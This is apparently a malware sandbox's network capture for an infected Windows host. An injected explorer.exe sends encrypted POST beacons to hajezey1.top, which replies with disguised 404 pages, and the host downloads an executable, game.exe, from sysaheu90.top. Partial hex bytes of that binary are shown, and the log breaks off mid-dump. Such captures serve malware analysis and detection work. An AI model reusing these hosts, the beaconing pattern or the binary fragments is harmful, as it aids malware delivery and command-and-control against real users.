Oct 29, 2021 20:50:10.242965937 CEST	6879	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49839	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:10.486630917 CEST	6879	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xxlvxgkbvo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 175 Host: hajezey1.top
Oct 29, 2021 20:50:10.486733913 CEST	6880	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8b 66 5d 02 c8 a1 c1 64 3a cf a3 7f Data Ascii: 6152Ek\lwmwu$f]d:5Y(zgH90[NS=YO!wd+ehF6>rPx6]=3J7ZIz#}<`
Oct 29, 2021 20:50:10.566930056 CEST	6880	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49840	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:10.650676966 CEST	6881	OUT	GET /game.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: sysaheu90.top
Oct 29, 2021 20:50:10.791618109 CEST	6882	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:50:10 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 Last-Modified: Fri, 29 Oct 2021 18:50:02 GMT ETag: "92a00-5cf824b80192b" Accept-Ranges: bytes Content-Length: 600576 Connection: close Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 82 db 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a8 07 00 00 c4 70 02 00 00 00 00 80 ad 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 9c b6 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 ab 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 38 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 a2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 a6 07 00 00 10 00 00 00 a8 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 69 77 65 72 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 c2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 80 77 02 00 24 01 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$UC4wC4wC4w,Bn4w,Ba4w,B<4wJLD4wC4v=4w,BB4w,BB4w,BB4wRichC4wPEL^p@xP@w?w80P@.text `.dataio@.ziwer0w@.rsrc?@w@@@.reloc"w$@B
Oct 29, 2021 20:50:10.791659117 CEST	6883	IN	Data Raw: fc ad 07 00 18 ae 07 00 26 ae 07 00 32 ae 07 00 3e ae 07 00 56 ae 07 00 74 ae 07 00 8e ae 07 00 a0 ae 07 00 bc ae 07 00 d4 ae 07 00 e2 ae 07 00 f0 ae 07 00 0a af 07 00 1e af 07 00 2e af 07 00 4a af 07 00 66 af 07 00 76 af 07 00 88 af 07 00 a0 af Data Ascii: &2>Vt.Jfv,>Pfz,:J`x2HZh
Oct 29, 2021 20:50:10.791682959 CEST	6885	IN	Data Raw: 64 00 75 00 72 00 69 00 6e 00 67 00 20 00 6e 00 61 00 74 00 69 00 76 00 65 00 20 00 63 00 6f 00 64 00 65 00 20 00 69 00 6e 00 69 00 74 00 69 00 61 00 6c 00 69 00 7a 00 61 00 74 00 69 00 6f 00 6e 00 0a 00 54 00 68 00 69 00 73 00 20 00 69 00 6e 00 Data Ascii: during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSI
Oct 29, 2021 20:50:10.791707039 CEST	6886	IN	Data Raw: 00 00 00 00 52 00 36 00 30 00 31 00 38 00 0d 00 0a 00 2d 00 20 00 75 00 6e 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 68 00 65 00 61 00 70 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 Data Ascii: R6018- unexpected heap errorR6017- unexpected multithread lock errorR6016- not enough space for thread
Oct 29, 2021 20:50:10.791733980 CEST	6887	IN	Data Raw: 6d 00 65 00 2c 00 20 00 70 00 72 00 6f 00 67 00 6e 00 61 00 6d 00 65 00 5f 00 73 00 69 00 7a 00 65 00 2c 00 20 00 4c 00 22 00 3c 00 70 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 6e 00 61 00 6d 00 65 00 20 00 75 00 6e 00 6b 00 6e 00 6f 00 77 00 Data Ascii: me, progname_size, L"<program name unknown>")Runtime Error!Program: wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[
Oct 29, 2021 20:50:10.791755915 CEST	6889	IN	Data Raw: 00 00 00 00 00 42 e6 3f 00 00 00 00 00 06 e6 3f 00 00 00 00 00 06 e6 3f 00 00 00 00 00 ca e5 3f 00 00 00 00 00 ca e5 3f 00 00 00 00 00 8e e5 3f 00 00 00 00 00 8e e5 3f 00 00 00 00 00 56 e5 3f 00 00 00 00 00 56 e5 3f 00 00 00 00 00 1e e5 3f 00 00 Data Ascii: B???????V?V???????z?z?F?F?????????R?R?$?
Oct 29, 2021 20:50:10.791776896 CEST	6890	IN	Data Raw: 0b ba b6 9d e1 3f 68 a2 a4 85 58 67 2b 3d 00 f8 6f 67 df e6 e1 3f aa 83 b9 81 ba 58 1a 3d 00 bc be d8 b0 30 e2 3f 7b 66 48 6e 06 fc 12 3d 00 3c c9 1e 9e 77 e2 3f 79 9b 35 73 33 52 36 3d 00 1c 84 f9 29 bf e2 3f ec b7 d3 61 38 8a fd 3c 00 0c 4f 34 Data Ascii: ?hXg+=og?X=0?{fHn=<w?y5s3R6=)?a8<O4W?4bV0=L?4@=@?X4=Tk?>_(=?o=@[c?,=$4b?dO"=lx?#608=&m?h"0=l?n6{<9[P
Oct 29, 2021 20:50:10.791798115 CEST	6892	IN	Data Raw: 2d ee bb 3f ad 16 8d 58 5b 46 b4 3c 00 06 c1 2b 90 2e bc 3f 58 8e 20 15 6b 6e e0 3c 00 45 90 d9 f4 6e bc 3f db 54 a9 28 8d 2b e5 3c 00 c6 de 55 5b af bc 3f d6 89 1b d4 06 9c e4 3c 00 27 e7 a4 c3 ef bc 3f 6a 75 21 34 b8 95 a9 3c 00 16 e5 ca 2d 30 Data Ascii: -?X[F<+.?X kn<En?T(+<U[?<'?ju!4<-0?<Qp?<?{<qw?_W<C1?'<I\r?Dc<s>?<w*I?n'$<23?z7<[>t?V-Ai<
Oct 29, 2021 20:50:10.791819096 CEST	6893	IN	Data Raw: 09 3d 00 88 5d c6 b0 13 d1 3f 01 96 a0 9d 36 87 0d 3d 00 6f da 4a 13 56 d1 3f 4a 8e f3 20 b2 62 05 3d 00 27 34 f4 88 98 d1 3f 2f b5 90 74 de 3e e1 3c 00 77 ed 1a 12 db d1 3f 61 eb 60 cc d6 d7 f8 3c 00 a3 5f 18 af 1d d2 3f 1f 61 dd 09 ae 65 07 3d Data Ascii: =]?6=oJV?J b='4?/t><w?a`<_?ae=F``?/f=#&?5SmT4<W?Rz< (?vY<k?pY.=y?8'<KuC?j<{=2<5?d=x?"a=@ic?%[9=
Oct 29, 2021 20:50:10.791840076 CEST	6894	IN	Data Raw: 05 f1 6f 50 eb 40 14 3d 00 b0 da 59 ea 15 e8 3f e2 7f b1 cf bf 03 09 3d 00 07 01 84 0c 6e e8 3f 75 cd d0 98 3f b3 1b 3d 00 25 92 6b 19 c7 e8 3f 5a 45 4d 2d 27 5e 10 3d 00 10 44 54 1b 21 e9 3f 3a 5a c2 ca 6e 3d 1a 3d 00 b7 f5 30 1d 7c e9 3f 07 d0 Data Ascii: oP@=Y?=n?u?=%k?ZEM-'^=DT!?:Zn==0\|?O=*?m}I{=eP5?+}ZI=Q?^oc;<'?u/r<S?i1=q?/={ss?VV&=#k~?[<?vB<6#M?
Oct 29, 2021 20:50:10.843055010 CEST	6896	IN	Data Raw: 93 11 5c 25 ef 3f 66 2c ce f3 91 21 ef 3f ea b0 b8 25 bf 1d ef 3f 4e 0e 1f a4 e3 19 ef 3f 24 08 c4 6b ff 15 ef 3f 80 6f 61 79 12 12 ef 3f 2a 14 a8 c9 1c 0e ef 3f 9c b5 3f 59 1e 0a ef 3f cd f3 c6 24 17 06 ef 3f c2 3f d3 28 07 02 ef 3f ee cb f0 61 Data Ascii: \%?f,!?%?N?$k?oay?*??Y?$??(?a?9y?99R?%R?F?@I?j T?0<?2j?p~?,L?@_o?7?'?VG?D<xZu?`\@j?)]Gq`?LcU?JupJ?CY

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49842	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:13.837456942 CEST	7510	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bfxffaryp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: hajezey1.top
Oct 29, 2021 20:50:13.837476969 CEST	7511	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 8b 66 5d 02 c9 a1 c1 64 01 c7 ae 6a Data Ascii: 6152Ek\lwmwu$f]dj,\#e}p!Pgypc z?wpIA9TTv#`LA#dbZU'b9a$ 2;~29OZQin/kK7jPv<@U(=
Oct 29, 2021 20:50:13.913882971 CEST	7511	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49843	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:14.097301960 CEST	7512	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://blprmuxml.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: hajezey1.top
Oct 29, 2021 20:50:14.097315073 CEST	7513	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 88 66 5d 02 c8 a1 c1 64 07 a8 d3 64 Data Ascii: 6152Ek\lwmwu$f]dd+TLtD+C]od4Y&bQ"}8>a,T-~s/50'LiKH'l3!gi:JD?\|1<kTX]f9\|W8Bh'4ZY]7
Oct 29, 2021 20:50:14.177367926 CEST	7513	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49844	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:14.302923918 CEST	7514	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tkemri.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: hajezey1.top
Oct 29, 2021 20:50:14.302942991 CEST	7515	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 89 66 5d 02 c8 a1 c1 64 1e 87 df 6f Data Ascii: 6152Ek\lwmwu$f]do6-FX0S}<d?=]<y'mUwSy3^lq[3 <?$,%!W"U0x"<V-&!g3f?G:>l}HN<
Oct 29, 2021 20:50:14.386461020 CEST	7515	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49856	162.159.129.233	443	C:\Users\user\AppData\Local\Temp\3C84.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.4	49845	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:14.553982019 CEST	7516	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uereap.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 263 Host: hajezey1.top
Oct 29, 2021 20:50:14.554013968 CEST	7516	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 86 66 5d 02 c8 a1 c1 64 17 a5 be 71 Data Ascii: 6152Ek\lwmwu$f]dq_X>lF~e9#yE`Beyx3z00s2 h"94e,K09xu=7{p"\zsO\<\|<QwEuo`MId$p:VC
Oct 29, 2021 20:50:14.637828112 CEST	7517	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 